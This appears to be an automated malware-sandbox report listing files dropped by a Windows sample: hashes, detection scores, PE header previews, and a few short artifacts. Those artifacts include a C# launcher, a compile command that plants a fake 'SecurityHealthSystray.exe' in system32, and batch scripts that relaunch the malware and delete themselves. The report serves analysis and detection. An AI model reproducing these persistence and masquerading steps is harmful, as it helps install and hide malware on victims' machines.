                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q..H0.H0.H0.AH@.F0.$D.J0.$D.D0.$D.@0.$D.L0..D.K0..X.J0.H0..0..D.I0..D.G0..D.I0..D,.I0..D.I0.RichH0.........................PE..d...+3.`.........." .........H...............................................@............`.........................................p...P............ ..........X,...........0..`...p...T...............................8...............(............................text............................... ..`.rdata..............................@..@.data...X*.......$..................@....pdata..X,..........................@..@.rsrc........ ......................@..@.reloc..`....0......................@..B........................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):66224
                                                  Entropy (8bit):6.0452398780318815
                                                  Encrypted:false
                                                  SSDEEP:768:Pyz+AYBOBSFlUx/tF5IzZL0fpde9E9GD2Fe7POoJp3RIyYIeqDG4yvOhz:QfBSbyFy1kumGM4Oo/RIyYIeuyvy
                                                  MD5:7C69CB3CB3182A97E3E9A30D2241EBED
                                                  SHA1:1B8754FF57A14C32BCADC330D4880382C7FFFC93
                                                  SHA-256:12A84BACB071B1948A9F751AC8D0653BA71A8F6B217A69FE062608E532065C20
                                                  SHA-512:96DBABBC6B98D473CBE06DCD296F6C6004C485E57AC5BA10560A377393875192B22DF8A7103FE4A22795B8D81B8B0AE14CE7646262F87CB609B9E2590A93169E
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^..^..^..&e.^...*..^...*..^...*..^...*..^..S*..^...6..^../7..^..^...^..S*..^..S*..^..S*..^..S*..^..Rich.^..........PE..d...>3.`.........." .....d..........XC.......................................0.......T....`.............................................P.................................... ..........T...........................P...8............................................text....b.......d.................. ..`.rdata..8R.......T...h..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):162992
                                                  Entropy (8bit):6.767227461585096
                                                  Encrypted:false
                                                  SSDEEP:3072:ajV4pA1vcDRI45a4I9ihQsDPGAznfo9mNo6ndir1NZIyD1UsVM:ajV4pA10Dj5azDePlwYO6cr1NFVM
                                                  MD5:493C33DDF375B394B648C4283B326481
                                                  SHA1:59C87EE582BA550F064429CB26AD79622C594F08
                                                  SHA-256:6384DED31408788D35A89DC3F7705EA2928F6BBDEB8B627F0D1B2D7B1EA13E16
                                                  SHA-512:A4A83F04C7FC321796CE6A932D572DCA1AD6ECEFD31002320AEAA2453701ED49EF9F0D9BA91C969737565A6512B94FBB0311AEE53D355345A03E98F43E6F98B2
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0.C.0.C.0.C.HMC.0.C.D.B.0.C.D.B.0.C.D.B.0.C.D.B.0.C>D.B.0.C.X.B.0.C.0.C.0.C>D.B.0.C>D.B.0.C>D!C.0.C>D.B.0.CRich.0.C........PE..d...F3.`.........." .....|...........2....................................................`..........................................6..L....7..x............`.......`..........4...x...T..............................8...............8............................text...}z.......|.................. ..`.rdata..............................@..@.data........P.......4..............@....pdata.......`.......<..............@..@.rsrc................T..............@..@.reloc..4............^..............@..B................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):80048
                                                  Entropy (8bit):6.145505737856069
                                                  Encrypted:false
                                                  SSDEEP:1536:AeG2cHel7zjv5Qe9AM9/s+m+p7ncSrpZjxk1IyBwayyq:3IyzjeMAM9/sb+p4Srbji1IyBwD
                                                  MD5:FD1CFE0F0023C5780247F11D8D2802C9
                                                  SHA1:5B29A3B4C6EDB6FA176077E1F1432E3B0178F2BC
                                                  SHA-256:258A5F0B4D362B2FED80B24EEABCB3CDD1602E32FF79D87225DA6D15106B17A6
                                                  SHA-512:B304A2E56829A557EC401C6FDDA78D6D05B7495A610C1ED793D6B25FC5AF891CB2A1581ADDB27AB5E2A6CB0BE24D9678F67B97828015161BC875DF9B7B5055AE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j...........'.p.(..B..,..B.."..B..&..B..-.....,..u..)........../...../....../...../..Rich...................PE..d...;3.`.........." .....z...........(.......................................`.......=....`.........................................p...P............@.......0...............P..........T...........................P...8............................................text...ny.......z.................. ..`.rdata...y.......z...~..............@..@.data...(...........................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                  Category:dropped
                                                  Size (bytes):846629
                                                  Entropy (8bit):5.4753143707660685
                                                  Encrypted:false
                                                  SSDEEP:24576:Phia1OtQcosQNRs54PK4ItaVwHEfVEZIwE0G:Phia1OicosQNRs54PK4IpQ
                                                  MD5:2ABE470164E060916C6842DA1263E5AD
                                                  SHA1:197163BFB26CE54420FA6EBA03CF0FA0A5622934
                                                  SHA-256:151A4C8EA261130B5AE94653E5470AC6FE4663DE269C187B2B38D6FCCADC1BAA
                                                  SHA-512:01E2C58B24F7D3D7B31DF97C6DBE8AEE0C0F61F457C78D62830FA954C17DFFB74B4E5389EF389926B5BA78F96DEB08AD4CD61C9ECEA256BF35E0A99CD2366D65
                                                  Malicious:false
                                                  Preview:PK..........!...=............_bootlocale.pyca....................................@....x...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nHz.e.j...W.n2..e.yh......e.e.d...rZd.d.d...Z.n.d.d.d...Z.Y.n.0.d.d.d...Z.d.S.)...A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C........t.j.j.r.d.S.t.....d...S.).N..UTF-8.........sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r......_bootlocale.py..getpreferredencoding...............r......getandroidapilevelc....................C........d.S.).Nr....r....r....r....r....r....r...............c....................C........t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r......r....r....r......localer......r....r....r....r....r....r.....................c....................C....6...|.r.J...t.j.j.r.d.S.t...t.j...}.|.s2t.j.d.k.r2d.}.|.S.).Nr......darwin..r....
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3406016
                                                  Entropy (8bit):6.095119740432485
                                                  Encrypted:false
                                                  SSDEEP:98304:ZX+SicVMcqx5q6ypQ821CPwDv3uFfJwwzS:1FicVMcqx5q6yX21CPwDv3uFfJwwz
                                                  MD5:89511DF61678BEFA2F62F5025C8C8448
                                                  SHA1:DF3961F833B4964F70FCF1C002D9FD7309F53EF8
                                                  SHA-256:296426E7CE11BC3D1CFA9F2AEB42F60C974DA4AF3B3EFBEB0BA40E92E5299FDF
                                                  SHA-512:9AF069EA13551A4672FDD4635D3242E017837B76AB2815788148DD4C44B4CF3A650D43AC79CD2122E1E51E01FB5164E71FF81A829395BDB8E50BB50A33F0A668
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x...<.<.<.5.;...n...>.n...7.n...4.n...?.g...7.<.......!.....E.....=...W.=.....=.Rich<.................PE..d....El`.........." .....f$..........s........................................4......F4...`..............................................h...3.@.....3.|.....1.......3.......4..O...~,.8........................... .,...............3..............................text....d$......f$................. ..`.rdata........$......j$.............@..@.data....z...p1..,...L1.............@....pdata..d.....1......x1.............@..@.idata...#....3..$...43.............@..@.00cfg........3......X3.............@..@.rsrc...|.....3......Z3.............@..@.reloc...x....4..z...b3.............@..B........................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4462768
                                                  Entropy (8bit):6.436862397697842
                                                  Encrypted:false
                                                  SSDEEP:49152:Fj3PQkQ7o11Nr9feH8NoaGh5A9lhIrcoFHuGxOCrls2Xtu6rfPa7w3J1AfkovlBl:RQkQ7o/Qeef6K3AroFVvrHRMRLwbCP
                                                  MD5:5CD203D356A77646856341A0C9135FC6
                                                  SHA1:A1F4AC5CC2F5ECB075B3D0129E620784814A48F7
                                                  SHA-256:A56AFCF5F3A72769C77C3BC43C9B84197180A8B3380B6258073223BFD72ED47A
                                                  SHA-512:390008D57FA711D7C88B77937BF16FDB230E7C1E7182FAEA6D7C206E9F65CED6F2E835F9DA9BEFB941E80624ABE45875602E0E7AD485D9A009D2450A2A0E0F1F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................... ........................N...............k..z..k.....k."....k.....Rich...........................PE..d....3.`.........." .....*#..n#.....DP........................................F.......D...`..........................................b<.....T(=.|....0F.......D.h/....C......@F..u...$.T........................... .$.8............@#.p............................text...T(#......*#................. ..`.rdata..p....@#.......#.............@..@.data...P....P=......<=.............@....pdata..h/....D..0...LA.............@..@.rsrc........0F......|C.............@..@.reloc...u...@F..v....C.............@..B................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):28848
                                                  Entropy (8bit):6.167573133461333
                                                  Encrypted:false
                                                  SSDEEP:384:+Wu7bFYpo5K98HhIJg6mwhY6HqMGXYPAr70cE9o1IymGpMDG4y8lVJhj/:nykc6mwhBHqFY8p1IymGpMDG4yKhL
                                                  MD5:0E3CF5D792A3F543BE8BBC186B97A27A
                                                  SHA1:50F4C70FCE31504C6B746A2C8D9754A16EBC8D5E
                                                  SHA-256:C7FFAE6DC927CF10AC5DA08614912BB3AD8FC52AA0EF9BC376D831E72DD74460
                                                  SHA-512:224B42E05B4DBDF7275EE7C5D3EB190024FC55E22E38BD189C1685EFEE2A3DD527C6DFCB2FEEEC525B8D6DC35ADED1EAC2423ED62BB2599BB6A9EA34E842C340
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+.J~E.J~E.J~E.C...H~E.&.D.H~E.&.@.A~E.&.A.B~E.&.F.N~E...D.H~E...D.O~E.J~D..~E...H.K~E...E.K~E.....K~E...G.K~E.RichJ~E.........PE..d...;3.`.........." ....."...4............................................................`..........................................Q..L....Q..x............p..T....T..........@....B..T...........................0C..8............@..(............................text.... .......".................. ..`.rdata.......@.......&..............@..@.data........`.......B..............@....pdata..T....p.......D..............@..@.rsrc................H..............@..@.reloc..@............R..............@..B................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1120944
                                                  Entropy (8bit):5.374356784466345
                                                  Encrypted:false
                                                  SSDEEP:12288:lezMmuZ63NNQCb5Pfhnzr0ql8L8kkM7IRG5eeme6VZyrIBHdQLhfFE+uB/v:lezumZV0m88MMREtV6Vo4uYB/v
                                                  MD5:7AF51031368619638CCA688A7275DB14
                                                  SHA1:64E2CC5AC5AFE8A65AF690047DC03858157E964C
                                                  SHA-256:7F02A99A23CC3FF63ECB10BA6006E2DA7BF685530BAD43882EBF90D042B9EEB6
                                                  SHA-512:FBDE24501288FF9B06FC96FAFF5E7A1849765DF239E816774C04A4A6EF54A0C641ADF4325BFB116952082D3234BAEF12288174AD8C18B62407109F29AA5AB326
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.T~~.:-~.:-~.:-w..-x.:-..;,|.:-..?,r.:-..>,v.:-..9,}.:-..;,}.:-%.;,|.:-~.;-4.:-..7,..:-..:,..:-...-..:-..8,..:-Rich~.:-........................PE..d...-3.`.........." .....J..........X).......................................@............`.............................................X............ .......................0......`L..T............................L..8............`...............................text....I.......J.................. ..`.rdata......`.......N..............@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................
                                                  Process:C:\Chaindriver.exe
                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                  Category:dropped
                                                  Size (bytes):381
                                                  Entropy (8bit):5.001175613389123
                                                  Encrypted:false
                                                  SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L29JRKVW1KEaiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLK0
                                                  MD5:2114D83B4088779676F153EB860B3892
                                                  SHA1:0B447115B8683B027F33E4B7AE22995F37683234
                                                  SHA-256:1852D09F0EA6066B64EEFFA187E08F3CF72A2DD7AD2365A71E8245E45F0C96F4
                                                  SHA-512:F8CC81B7A5887FC3F6BF6F1A84D4206A556291CD1E8FFA718FC2DDFD99F9FB77D9AB0EAD2129B3084E27557E08BE4A0665C1610FBE238EA72BFBD0A272F8A61E
                                                  Malicious:false
                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\NOFqHeDosUIopsPGLT.exe"); } catch { } }).Start();. }.}.
                                                  Process:C:\Chaindriver.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):250
                                                  Entropy (8bit):5.10459549683291
                                                  Encrypted:false
                                                  SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fZUo:Hu7L//TRq79cQWfRZ
                                                  MD5:6290D4996F0E1EBFFB6E4BFECF26610C
                                                  SHA1:83D7A22F422C2B008C8D5864CAD2D87C4A9518BF
                                                  SHA-256:4BFB9E065ED124F47353B2C1F5FACA3D0E89457CC5F0B19CB5AC81EC102308CC
                                                  SHA-512:487AAA2C4122DEB7FFE973758F3C4F8C3DC05220CC3FEFA0AEE88BDED5CC6185BD16054375AD8594D0F80E2E8F964FC98A2B864D0F94C6ABE27B9F44DC91BD7B
                                                  Malicious:true
                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.0.cs"
                                                  Process:C:\Chaindriver.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (310), with CRLF, CR line terminators
                                                  Category:modified
                                                  Size (bytes):731
                                                  Entropy (8bit):5.260905904364904
                                                  Encrypted:false
                                                  SSDEEP:12:TRI/u7L//TRq79cQWfRcKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:lI/un/Vq79tWfWKax5DqBVKVrdFAMBJj
                                                  MD5:51705F0592956DC3F05E539E23BEE789
                                                  SHA1:F8E9DAAB1ADC774EB931DDCBC8F9F58B0862C763
                                                  SHA-256:2B3B6C2ABBFB9BC40BCA3C6D38F87460AB4B01DAECB441F1950CAF43E0618B01
                                                  SHA-512:86E96EADAA0B85EC9629D3A612F60E6B7021DF6C7BA36BFD0A0095A371915580B8F7A1CDB2E3B994EE98D704A3F2DE5C721ECEB3C3ACA2708ED958247F45EB13
                                                  Malicious:false
                                                  Preview:.C:\> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                  Process:C:\Chaindriver.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):194
                                                  Entropy (8bit):5.109556575951549
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDVNGvT2XuFK+KdTVpM3No+HK9ATSV+jn9moE9TYSBktKcKZG1t+kiE2J5xAIE:hCijTg3Nou1SV+DEoUKOZG1wkn23f3ih
                                                  MD5:0241AD5AB8EA99665915B56EF9AE9519
                                                  SHA1:75F9CD69CA11E3D030633E9EE86DCDB3D7A47107
                                                  SHA-256:6648838CEF93A074583024BCA9392133088962DF1F58C4D3580F94B53258E324
                                                  SHA-512:F29A6E40D699B62D11361590EDF645BB2CF3B434B30D68851FDA24D4F4B06F4D053CE0E1CDF21F8EE201784B94351532B6BEFB311EF8953C5979A266606DBA84
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Chaindriver.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\lrFP7pOB0Z.bat"
                                                  Process:C:\Chaindriver.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.183465189601646
                                                  Encrypted:false
                                                  SSDEEP:3:ScfhgPh1PSn:Su2Ph1qn
                                                  MD5:363C139ED732874608921CA4FB7113B0
                                                  SHA1:C2709C943368AE75E02A3F5948DD94608E56DBFC
                                                  SHA-256:9F354D4AB889108A95166113501789166C549B637417FC233DA3A91E5E45815F
                                                  SHA-512:BA3FEEC9EC2755E6A07304F0AFFE9AFBB8C0CC6971262553C0A3417C6E52A1CCBC06C4567D196733EC7EC5788B8453B0BC88EA154C19D92D305AD16F20D62802
                                                  Malicious:false
                                                  Preview:0VuGe38wDozDEjDPjnFQLij0K
                                                  Process:C:\Recovery\Memory Compression.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):210
                                                  Entropy (8bit):5.087865476001745
                                                  Encrypted:false
                                                  SSDEEP:6:hCijTg3Nou1SV+DE75N0BvKOZG1wkn23f+vCLqn:HTg9uYDE7LmDfdq
                                                  MD5:7653E52C4DECAEA0E61981EC451646C2
                                                  SHA1:3E35FCE50ACD8C234525A12ED9E66087D064089E
                                                  SHA-256:6DE1ED67523522C1C26CA7799ECA66AEEC649CC0621E46E652485AAA4FB02B07
                                                  SHA-512:E141AEEAD7FE200D22E5616EFE33F16D366E8863773604EA1BC1F576FCF25D2D25878A60BF61928AAB153447FE753440B3B9C0417B306111CFFD88CBD8966CB3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\Memory Compression.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\zsJdcY9yPm.bat"
                                                  Process:C:\Recovery\Memory Compression.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):23552
                                                  Entropy (8bit):5.519109060441589
                                                  Encrypted:false
                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Recovery\Memory Compression.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Chaindriver.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):23552
                                                  Entropy (8bit):5.519109060441589
                                                  Encrypted:false
                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Recovery\Memory Compression.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                  Process:C:\Chaindriver.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                  Process:C:\Recovery\Memory Compression.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                  Process:C:\Chaindriver.exe
